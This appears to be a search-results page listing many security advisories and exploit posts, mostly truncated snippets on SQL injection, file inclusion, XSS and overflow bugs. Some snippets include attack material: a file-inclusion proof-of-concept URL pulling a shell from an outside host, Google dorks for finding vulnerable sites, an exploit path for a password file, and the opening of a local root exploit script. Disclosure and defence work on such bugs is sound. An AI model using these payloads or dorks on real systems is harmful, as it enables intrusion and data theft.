47153 matches found
exploit (html) for Advanced Guestbook 2.2
In GOD We Trust; Kachal667 Under9round Team KuT new exploit with HTML for Advanced Guestbook 2.2 . This bug found by BHST. Coded By Hessam-x Note : For use this exploit first change target to victim example : www.targetsite.com/guestbook/admin.php =====HTML CODE : html titleGuestBook 2.2...
Micro Login System v1.0 (userpwd.txt) Password Disclosure Vulnerability
Micro Login System v1.0 userpwd.txt Password Disclosure Vulnerability Affected Software: Micro Login System v1.0 Download: http://www.hotscripts.com/jump.php?listingid=67504&jumptype=1 Bugfounder: 0x90 Contact: Gunsat0x90dotcomdotar homepage: WwW.0x90.CoM.Ar +Exploit: http://target/path/userpwd.t...
@lex Guestbook (PHP) Include file
Informations : °°°°°°°°°°°°°° Website : http://www.alexphpteam.com Version : all Problem : Include file PHP Code/Location : °°°°°°°°°°°°°°°°°°° ./include/livreinclude.php ------------------------------------------------------------------ if !$noconnect.... some include functions...
vpopmail-3.4.11 problems
The vpopmail package is an extension for Qmail that allows easy management of virtual domains and can use a SQL backend for storing user accounts. The program vchkpw in that package contains a vulnerability in its logging routines. The vchkpw program handles the username/password/domain...
[KIS-2014-07] Dotclear <= 2.6.2 (categories.php) SQL Injection Vulnerability
-------------------------------------------------------------- Dotclear = 2.6.2 categories.php SQL Injection Vulnerability -------------------------------------------------------------- - Software Link: http://dotclear.org/ - Affected Versions: Version 2.6.2 and probably prior versions. -...
PixelPost 1.7.1 File Disclosure
PixelPost 1.7.1 File Disclosure by Charles "real" F. charlesfolathotmail.fr http://realn.free.fr Requires registerglobals = On magicquotesgpc = Off PROOF OF CONCEPT TARGET URL: http://url/addons/copyfolder.php?...
[SA14600] PHPOpenChat "sourcedir" File Inclusion Vulnerability
---------------------------------------------------------------------- Monitor, Filter, and Manage Security Information - Filtering and Management of Secunia advisories - Overview, documentation, and detailed reports - Alerting via email and SMS Request Trial: https://ca.secunia.com/?f=l...
[SA12858] YaPiG comments Cross-Site Scripting Vulnerability
TITLE: YaPiG comments Cross-Site Scripting Vulnerability SECUNIA ADVISORY ID: SA12858 VERIFY ADVISORY: http://secunia.com/advisories/12858/ CRITICAL: Less critical IMPACT: Cross Site Scripting WHERE: From remote SOFTWARE: YaPiG 0.x http://secunia.com/product/3795/ DESCRIPTION: A vulnerability has...
Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc...
VoltEdit CMS SQL Injection Admin Login Bypass & Shell Upload Vulnerability
========================================================================================== VoltEdit CMS SQL Injection Admin Login Bypass & Shell Upload Vulnerability ==========================================================================================...
Mambo com_serverstat Component <=0.4.4 Remote File Include Vulnerability
=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-= + +Mambo comserverstat Component =0.4.4 Remote File Include Vulnerability + =-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-= + +Author: xoron turkish hacker +...
[MajorSecurity Advisory #64]Apple Safari 4.0.4 Denial of Service
MajorSecurity Advisory 64Apple Safari 4.0.4 Denial of Service Details ============ Product: Apple Safari Webbrowser Security-Risk: low Remote-Exploit: yes Vendor-URL: http://www.apple.com/safari/ Vendor-Status: informed Advisory-Status: published on 02-02-2010 Credits ============ Discovered by:...
[Full-Disclosure] iDEFENSE Security Advisory 06.08.04: Squid Web Proxy Cache NTLM Authentication Helper Buffer Overflow Vulnerability
Squid Web Proxy Cache NTLM Authentication Helper Buffer Overflow Vulnerability iDEFENSE Security Advisory 06.08.04 www.idefense.com/application/poi/display?id=107&type=vulnerabilities June 8, 2004 I. BACKGROUND Squid is a fully-featured Web Proxy Cache designed to run on Unix systems and supports...
firefly 1.1.01 <= Remote File Include Vulnerablitiy
firefly 1.1.01 = Remote File Include Vulnerablitiy D.Script: http://fresh.t-systems-sfr.com/unix/src/privat2/firefly-1.1.01.tar.gz Discovered by: Alkomandoz Hacker Homepage: asb-may.net & mohandko.com & sniper-sa.com & Tryag.com ====================================...
WDT :-phpopenchat-3.0.* ($sourcedir) Remote File Inclusion Exploit
World Defacers Team --------------------Summary---------------- eVuln ID: WD23 Vendor: phpopenchat-3.0. Vendor's Web Site: http://phpopenchat.org Class: Remote PoC/Exploit: Available Solution: Not Available Discovered by: rUnViRuS wdzone.net & worlddefacers.de...
UseBB Version 1.0.4 Path Disclosure Vulnerability
netVigilance Security Advisory 16 UseBB Version 1.0.4 Path Disclosure Vulnerability Description: UseBB is an Open Source forum package developed in PHP and using the popular MySQL database back-end to store data. Unlike other popular forum systems, UseBB does not strive to have as many features a...
OpenSSH's UseLogin option allows remote access with root privilege.
OpenSSH's UseLogin option allows remote access with root privilege. 1. Systems affected: The default installation of OpenSSH is not vulnerable, since UseLogin defaults to 'no'. However, if UseLogin is enabled, all versions of OpenSSH prior to 2.1.1 are affected. 2. Description: If the UseLogin...
XSS vulnerability in swfupload in WordPress
Hello 3APA3A! I will draw your attention to XSS vulnerability in swfupload in WordPress. In April there was announced Cross-Site Scripting vulnerability in swfupload.swf in WordPress CVE-2012-3414. It was fixed in WordPress 3.3.2. At that time there was no detailed information about it. Last week...
ASP Discussion Forum Remote XSS Attack
Hi, I found a vulnerability in ASP Discussion Forum. The vulnerability is a Remote XSS Attack. This is the original Advisory: http://colander.altervista.org/advisory/ASPDisc.txt Let me know if you want to post it up or not. Best Regards, Omni -- Email.it, the professional e-mail, gratis per te:...
RichStrong CMS (showproduct.asp?cat=) Remote SQL Injection Exploit
Info: Software: RichStrong CMS HomePage: http://www.hzrich.cn Exploit: Remote Sql Injection High Where: showproduct.asp?cat= Bug Found By: Jose Luis Gуngora Fernбndez|JosS Contact: sys-projectathotmail.com Web: http://www.spanish-hackers.com Dork: "Power by:RichStrong CMS" Dork2: Priv8, xD! +...
DoS in Intel corporation 'InBusiness eMail Station'
Intel corporation 'InBusiness eMail Station' firmware version 1.04.87 latest Denial of service vulnerability. Vendor notification date: 20/10-2000 Public notification date: 20/10-2000 Problem: I found a buffer overflow in the Intel InBusiness eMail Station, which can enable an attacker to execute...
APPLE-SA-2015-09-16-2 Xcode 7.0
APPLE-SA-2015-09-16-2 Xcode 7.0 Xcode 7.0 is now available and addresses the following: DevTools Available for: OS X Yosemite v10.10.4 or later Impact: An attacker may be able to bypass access restrictions Description: An API issue existed in the apache configuration. This issue was addressed by...
SQL Injection in CLANSPHERE
Vulnerability ID: HTB22694 Reference: http://www.htbridge.ch/advisory/sqlinjectioninclansphere.html Product: CLANSPHERE Vendor: csphere.eu http://www.csphere.eu/ Vulnerable Version: 2010.0 Final Vendor Notification: 02 November 2010 Vulnerability Type: SQL Injection Status: Fixed by Vendor Risk...
Microsoft Security Bulletin MS10-046 - Critical Vulnerability in Windows Shell Could Allow Remote Code Execution (2286198)
Microsoft Security Bulletin MS10-046 - Critical Vulnerability in Windows Shell Could Allow Remote Code Execution 2286198 Published: August 02, 2010 Version: 1.0 General Information Executive Summary This security update resolves a publicly disclosed vulnerability in Windows Shell. The vulnerabili...
Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc...
CVE-2012-0037: libraptor - XXE in RDF/XML File Interpretation (Multiple office products affected)
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 VSR Security Advisory http://www.vsecurity.com/ =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Advisory Name: libraptor - XXE in RDF/XML File Interpretation Release Date: 2012-03-24 Applications: libraptor / librdf...
[slackware-security] httpd (SSA:2015-198-01)
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 slackware-security httpd SSA:2015-198-01 New httpd packages are available for Slackware 14.0, 14.1, and -current to fix security issues. Here are the details from the Slackware 14.1 ChangeLog: +--------------------------+...
[SECURITY] CVE-2009-3548 Apache Tomcat Windows Installer insecure default administrative password
CVE-2009-3548: Apache Tomcat Windows Installer insecure default administrative password Severity: Low Vendor: The Apache Software Foundation Versions Affected: Tomcat 5.5.0 to 5.5.28 Tomcat 6.0.0 to 6.0.20 The unsupported Tomcat 3.x, 4.0.x, 4.1.x and 5.0.x versions may be also affected...
Multiple FPS game servers buffer overflow with PunkBuster
Buffer overflow on oversized packet if PunkBuster protection is turned on...
Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc...
[security bulletin] HPSBPV02891 rev.1 - HP ProCurve Switches, Remote Unauthorized Information Disclosure
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emrna-c03819065 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c03819065 Version: 1 HPSBPV02891 rev....
Etherleak: Ethernet frame padding information leakage (A010603-1)
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 @stake, Inc. www.atstake.com Security Advisory Advisory Name: Etherleak: Ethernet frame padding information leakage Release Date: 01/06/2003 Application: Ethernet device driver software Platform: Multiple Severity: Information disclosure Authors: Ofir...
[Full-disclosure] udev exploit
!/bin/sh Linux 2.6 bug found by Sebastian Krahmer lame sploit using LD technique by kcope in 2009 tested on debian-etch,ubuntu,gentoo do a 'cat /proc/net/netlink' and set the first arg to this script to the pid of the netlink socket the pid is udevdpid - 1 most of the time + sploit has to be UNIX...
Wordpress Pingback Port Scanner
Hi folks, Wordpress 3.5 has it's XML-RPC Interface enabled by default. See here for more information: http://www.ethicalhack3r.co.uk/security/introduction-to-the-wordpress-xml-rpc-api/ http://codex.wordpress.org/Version3.5Settings I read through the article and took a look at the Pinback API sinc...
Active Link Engine Remote SQL Injection Vulnerability
Title : Active Link Engine Remote SQL Injection Vulnerability Author : CyberGhost My Web Site : http://aspspider.org/cgsecurity Demo Page : http://www.activewebsoftwares.com/demoactivelinkengine Script Page : http://www.activewebsoftwares.com/productinfo.aspx?ProductID=7 Vuln. Username :...
piranha default password/exploit
Hi, In the interest of full disclosure I used an alias the last few times, let's see how this goes as me here are the details of the piranha vulnerability. RE: ISS Security Advisory iss.00-04-24.Piranha To summarize, piranha is a GUI tool for monitoring, configuring, and administering an LVS...
OpenBSD DoS
System crash on ELF parsing...
[ANN][SECURITY] Struts 1 - CVE-2014-0114 -Mitigation Advice Available, Possible RCE Impact
As confirmed in our last announcement, the Apache Struts 1 framework in all versions is affected by a ClassLoader manipulation vulnerability CVE-2014-0114 similar to a recently fixed vulnerability in Struts 2 CVE-2014-0112, CVE-2014-0094 1. Thanks to the efforts of Alvaro Munoz and the HP Fortify...
Belkin WiFi NetCam video stream backdoor with unchangeable admin/admin credentials
Product: Product NetCam WiFi Camera With Night Vision, purchased August 2013 Summary: Live video stream is accessible with user/password of admin/admin. The user/password combination admin/admin cannot be changed by the user. This "feature" is undocumented. To reproduce: 1. Connect webcam to...
Insecure RSA Encryption in jCryption, PEAR Crypt_RSA and Crypt_RSA2
SWITCH-CERT SECURITY ADVISORY ============================= Vulnerability: Insecure Implementation of RSA Encryption Affected Products: jCryption, PEAR CryptRSA, PEAR CryptRSA2 Advisory Date: 2011-11-30 Advisory Author: Daniel Roethlisberger, SWITCH-CERT Introduction Web applications using...
XEE vulnerabilities in SharePoint (MS11-074) and DotNetNuke
Hello, Microsoft recently published MS11-074. This bulletin concerns mainly SharePoint 2007 and 2010 but CVE-2011-1892 applies too to Office Groove client and server, Office Forms Server 2007 and Office Web Apps 2010. The vulnerability is a "XML External Entity Reference" one, as described in...
Excel 0day : Excel 2000/XP/2003 Style 0day POC
Excel 0day : Excel 2000/XP/2003 Style 0day POC POC http://www.hitcon.org/Nanika.xls Description: A vulnerability has been discovered in Microsoft Excel, which can be exploited by malicious people to compromise a user's system. Excel 2003 & XP EIP- 00xx00xx Click Repair Mode .......Exploit....:P...
Apple Xcode multiple security vulnerabilities
Restrictions bypass, weak encryption, information discosure, multiple svn vulnerabilities...
Tagger v3 <= BBCodeFile Remote file inclusion
Tagger v3 = BBCodeFile Remote file inclusion Discovered by : Morgan Error in : tags.php include$BBCodeFile; Vendor Website: http://www.venturenine.com PoC: http://victim-site.com/tags.php?BBCodeFile=http://ehmorgan.net/shell.dat? Google dork: intitle:"Tagger LE" inurl:tags.php Visit us :...
CyberShop-ASP 6.0Fx Vulnerable with shopdbtest.asp
$Indonesia - Security Development Team 2000 - 2003 Advisory Name: CyberShop-ASP 6.0Fx Vulnerable with shopdbtest.asp Release Date: 3:41 PM 7/13/03 Application: CyberShop ASP 6.0Fx Platform: Win32 Severity: High BUG Type: Security leak Author: DrPonidi [email protected] Discover by:...
New vulnerabilities in CapCC for WordPress
Hello 3APA3A! I'm informing you about new vulnerabilities in WordPress plugin CapCC http://websecurity.com.ua/2688/. These are Insufficient Anti-automation, Cross-Site Request Forgery and SQL Injection vulnerabilities. Insufficient Anti-automation: This captcha vulnerable to half-automated method...
[UNIX] Pivot Remote Code Execution Vulnerability
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com - - promotion The SecuriTeam alerts list - Free, Accurate, Independent. Get your security news from a reliable source...
Windows Software Restriction Policy Protection Bypass
Windows Software Restriction Policy Protection Bypass Class: Protection bypass Vector: Local Tested on: Windows XP SP2, Windows Server 2003 SP1 Risk: Low Remark: I don't know, what is it - bug or feature, but I can't find any documentation on this issue. Description: Software Restriction Policies...
Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc...
Advanced Guestbook 2.3.3 upload image bug
TITLE: Advanced Guestbook 2.3.3 upload image error and maybe possible file inclusion! Severity: Well for now I haven't tested it completely but if not patched it may cause a remote command execution and file inclusion. SOFTWARE: Advanced Guestbook 2.3.3 http://www.proxy2.de/ DESCRIPTION: At the...